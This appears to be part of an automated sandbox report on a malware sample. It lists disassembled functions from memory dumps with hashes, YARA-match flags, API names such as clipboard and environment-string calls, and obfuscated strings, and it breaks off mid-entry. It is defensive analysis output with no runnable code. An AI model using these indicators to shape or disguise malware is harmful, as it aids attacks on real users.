                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction ID: 569597801202ed4460f0987dac1f4b5eb8bd835c35808d378ead0dac98a1ca33
                                                            • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction Fuzzy Hash: 8041AFB17106049BDB588F19C88475677E2AF94328F48C1A9DD098F38ADB79C989CF81
                                                            Function 02156248 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                            • Instruction ID: 077d34d601cbd419e631990840f272bb6d564860935d01698b788ae2fce7ee64
                                                            • Opcode Fuzzy Hash: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                            • Instruction Fuzzy Hash: 994189B05483928BC324CF14C8607ABB7E6FF85254F444A1CE9EA9B780E7389945CBC6
                                                            Function 004138D2 Relevance: .1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2ea7132ad86297b03cba3dc6a24afaab823d50b359fc15a183b1f8e4a42ffb1
                                                            • Instruction ID: 2686aa34b6a76b27f20ffd05abd75c1ce39c7f7e6e1673e9cdff4e5e0361a673
                                                            • Opcode Fuzzy Hash: e2ea7132ad86297b03cba3dc6a24afaab823d50b359fc15a183b1f8e4a42ffb1
                                                            • Instruction Fuzzy Hash: A73134B19187118BD725CF14C8817BBB7D4AB85315F08143EE88997382EB7C9984CB9A
                                                            Function 004025A0 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                            • Instruction ID: 1173fd14226b6f9772cf5791de5bc0a1936854a118f46feab6fed66326430bb7
                                                            • Opcode Fuzzy Hash: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                            • Instruction Fuzzy Hash: 0931CA316046009BD7149E59CA84927B7E1FFC4318F18897EE899E73C1D67ADC42DB4A
                                                            Function 02142807 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                            • Instruction ID: 98056d42ccfd25c4f37446a44cdcaf4e00c87e1917dc39a2f5c57523557cd1f2
                                                            • Opcode Fuzzy Hash: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                            • Instruction Fuzzy Hash: 5E31C270A442029FD7189E18CC80A2EB7E1EFC5358F19897CFCAD9B251DB31D992CB42
                                                            Function 00440D36 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                            • Instruction ID: e355dcfae9e044697576bbfde22a8f19920d75dde12cc047ec3e3f6d5b1960e9
                                                            • Opcode Fuzzy Hash: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                            • Instruction Fuzzy Hash: 8B41BA70418690DFD775DB3081A9DBA7FF1BE0A21538B54EEC0869F4A3EA34D186DB05
                                                            Function 00431680 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: eaecee785cbc552ffb01b79b63469848f54c5be3ad95e1fd29ce6da9ec180bfb
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction Fuzzy Hash: DD110C33A051D40FC3168D7C8410565BFE30AA7275F5D539AF4B49B2E2D6278D8B8359
                                                            Function 021718E7 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: 59e2548f491e7600099340ffc40d90b02345ff89fc0fd139df4272503dd40497
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction Fuzzy Hash: 0B11C233A491D40EC31A8D3C84005A9BFF30AD3535F198399E4F89B2D2C722C98BC360
                                                            Function 004248E0 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                            • Instruction ID: 20b21e30a0ec0fb2c99107143c2b9476f8de25489f108ff1004ace05f2c41b4d
                                                            • Opcode Fuzzy Hash: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                            • Instruction Fuzzy Hash: DB0192F9B0071147E620AF25F8C1727A2A89BC1718F58483EE84457342DB7DEC44C6A9
                                                            Function 02164B47 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                            • Instruction ID: ffed969724d6793407d846275dc0e2c772e288a84eeda5da4526246c819e0252
                                                            • Opcode Fuzzy Hash: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                            • Instruction Fuzzy Hash: 630171F57403425BD730AE54C8C8B3FB2A9AF85708F19442CD95957200DFB6E826CA91
                                                            Function 007BE06B Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: ddcccf6f637a7a867ce81a0cfd4f1aea3505b685fc5fdf4228cde4255b0c81eb
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: BC117C72340100EFE754EE59DCC1FE673EAEB88320B298065ED04CB356D6BAE801C760
                                                            Function 004381BB Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                            • Instruction ID: 834250698d5e0500e56c7bb278610784be947653ec03dbaf781bc3f884b91dae
                                                            • Opcode Fuzzy Hash: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                            • Instruction Fuzzy Hash: 2A1134B01083458BD714CF51C1A066BF7E1FF89788F14995EE4D19B251D7BCD909CB8A
                                                            Function 004106B1 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                            • Instruction ID: 889cefc2f7097b9c6db9ab6823b190a93607d6c31bc0b71ec5331936f27af802
                                                            • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                            • Instruction Fuzzy Hash: A711F5746093808BE324DF14C8A4B9FFBF1BB86304F044A2DE5959B2D1D7BA9845CF86
                                                            Function 02150918 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                            • Instruction ID: 5733ff4a4e356f49c065b5935459ad3cc4a2277fae16f840b85429f908d5ad76
                                                            • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                            • Instruction Fuzzy Hash: 6011F574649380CBE324CF54C864B5FFBF1BF86304F044A2CE9958B290D77A9805CB86
                                                            Function 02140D90 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: 4d0c7fc28f0df5c0d444da8e6d13caba3407804bcf0b1067487c970ded40c4d9
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: 4D01F772A506008FDF25CF21CC14BAA33F5EF89205F1540B4DA0E97241EB70A9458B80
                                                            Function 0040FBB4 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                            • Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
                                                            • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                            • Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A
                                                            Function 0214FE1B Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                            • Instruction ID: bab08fb445bf84a25fbbcaac92b67da625fc90414ceb79070d573fed7f32e22f
                                                            • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                            • Instruction Fuzzy Hash: BC116DB01883C28BD334CF14D864BEFB7E1BB86345F58182CD89997382C77984518F46
                                                            Function 00438F15 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                            • Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
                                                            • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                            • Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A
                                                            Function 0217917C Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                            • Instruction ID: a6949d1f124d6d5d2ad74f6a56092a73f10788c7b6d5571589979a72560a608e
                                                            • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                            • Instruction Fuzzy Hash: 1BE04FBE9912A08BCB688F24D895572B7B0FB83E64B59501DE446E7250D730EC54CB06
                                                            Function 021612E0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                            • Instruction ID: 8c7c88da664f41954977a0a036912264f92ccc1c7e9f395cb6c1d28cfbc37c60
                                                            • Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                            • Instruction Fuzzy Hash: FDE0C2546885838BC7098E29947833BF7E95F0320BF2C91B9D8DB8BA41E725E060C704
                                                            Function 0040CB10 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                            • Instruction ID: 15f5a020169ecd94f448affbf7eac2585d4a5225e6d21b45986e377c0b9b8dd8
                                                            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                            • Instruction Fuzzy Hash: 52D0A7715487A14ED7588E3824E157BFBF8E947612B1825AFE4D1F3245D234EC01879D
                                                            Function 0214CD77 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                            • Instruction ID: 14a0096c44c011d44ffb7cba3773964183977a0ba8763cf4e1d608bc95c5c292
                                                            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                            • Instruction Fuzzy Hash: A5D0A7615897A10E5B588D3804A0877FFE4EA47516F18149FE4D9E3105D721D80187E8
                                                            Function 007C32E7 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                            • Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
                                                            • Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                            • Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21
                                                            Function 0215D097 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                            • Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
                                                            • Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                            • Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C
                                                            Function 0215CF1A Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                            • Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
                                                            • Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                            • Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D
                                                            Function 0216EEF7 Relevance: 50.9, APIs: 4, Strings: 25, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$DeleteSelect
                                                            • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                            • API String ID: 618127014-763545205
                                                            • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                            • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                            Function 0216ED17 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                            • String ID: @$A$C$F
                                                            • API String ID: 2111159801-319984173
                                                            • Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                            • Instruction ID: b589fd66007ea2f994edfb6aa03c7a9a7e85a487102d188ad055a9fc3c5e09e2
                                                            • Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                            • Instruction Fuzzy Hash: D051447450C380CFC3109B689488B6EBFE1AB96224F550F2EF4E586291D7398559CB93
                                                            Function 0215D207 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0215D307
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0215D334
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928
                                                            • Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                            • Instruction ID: b8f0af4e05d4b572de81e7eba0dac071d76b72849990208b81d30b1a70aec42d
                                                            • Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                            • Instruction Fuzzy Hash: 73617AB1648351CFD328CF14C8A0BABB7E1EFC6318F054A5DE8E65B280D7749905CB92
                                                            Function 0215D205 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0215D307
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0215D334
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928
                                                            • Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                            • Instruction ID: 9fcf1fc7095408a483678534f5c46234f36afc72bad3dc4ed068f5b07a97c184
                                                            • Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                            • Instruction Fuzzy Hash: 006169B16483518FE328CF14C8A0BABB7E1EFC6318F054A5DE8E65B280D7749905CB96
                                                            Function 0215DB47 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0215DC71
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0215DCA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
